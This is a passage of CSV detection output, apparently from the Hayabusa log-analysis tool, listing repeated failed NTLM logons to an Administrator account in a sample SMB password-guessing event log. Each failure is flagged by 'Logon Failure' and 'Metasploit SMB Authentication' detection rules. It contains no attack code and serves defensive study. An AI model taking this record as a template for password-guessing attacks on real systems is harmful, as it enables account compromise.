Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxc4iIHP0kdqQNiG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RJIWekwBwcIUWjD1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GdnvboiIDzXTZ8MR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGMPHNpljTlMYeet : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWo4uVFtAbe4IjKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YAPdDqbMY4rYiuZ3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ai2WCQ3MkWwSeOy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ey1wbsD7w3fs02xP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sVGzidwZICNfLizg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zjGPMJ6RBw48Ejx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MydK8AjPvyyckCEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fqkCliAQMiFffQU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITkku4kN4csBFyUB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g9kMkSFhKrT2Py : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1xKLdwujTmLEc9ts : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sAW1YzCQ3CreseaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhqBirEHOKPepR3n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uqSFXpzAWOnc90n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: McbeS9lRpbMc48jO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6J0d7dQUmJNKJlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QG3WU91rhTP9odx7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSQRgB8yMfhb03g1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bzbZjRXTc0XvV4Ry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3ShOCSaLGX4YBWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lIrydzi8nmY251Z1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h4vlRksTGxAqEt9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJMnD0foEDbcNfTj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNWppBJLFojEFtiF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7a9Tvr6ruDpiG2T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBNIizCKz2ybc3eM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YwuXQhISpgfSFqZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeONLdrrauxqvgaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RFqSH4toadsTideV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuMa0Juj1tjL6NDY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UA8zU0kJ6gAFqSaF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jvX85gF8wk3AGJyb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpzOMKQIBrkQW5Os : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqzrLAqHNi4CHT56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HWMap8qHlykO6Yeu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pkc9LWakJBjhBQv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y43cE75gTzA1XjHF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HopaYDAbYxHjJEr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: brNgudTWJaKs8nLd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzPwOqU92kdGodBH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXlzxK5OXL9hpqrZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2cLdgWvrVh7h2jPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h34xlYavVsXQRCYG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 